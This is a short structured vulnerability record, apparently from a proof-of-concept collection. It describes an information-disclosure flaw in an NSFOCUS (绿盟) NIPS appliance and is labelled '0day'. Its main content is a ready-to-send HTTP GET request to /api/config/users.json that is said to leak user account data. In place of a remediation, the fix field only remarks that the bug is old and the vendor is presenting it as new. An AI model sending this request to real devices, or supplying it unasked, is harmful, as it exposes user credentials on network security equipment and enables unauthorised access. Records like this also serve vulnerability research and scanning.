vendor = "绿盟"
name = "绿盟NIPS users.json敏感信息泄漏"
type = "信息泄露"
version = "未知"
path = "/api/config/users.json"
detail = "GET /api/config/users.json HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close"
fix = "老洞，厂商当新洞发"
date = "0705"
label = "0day"
verifier = "AdySec"
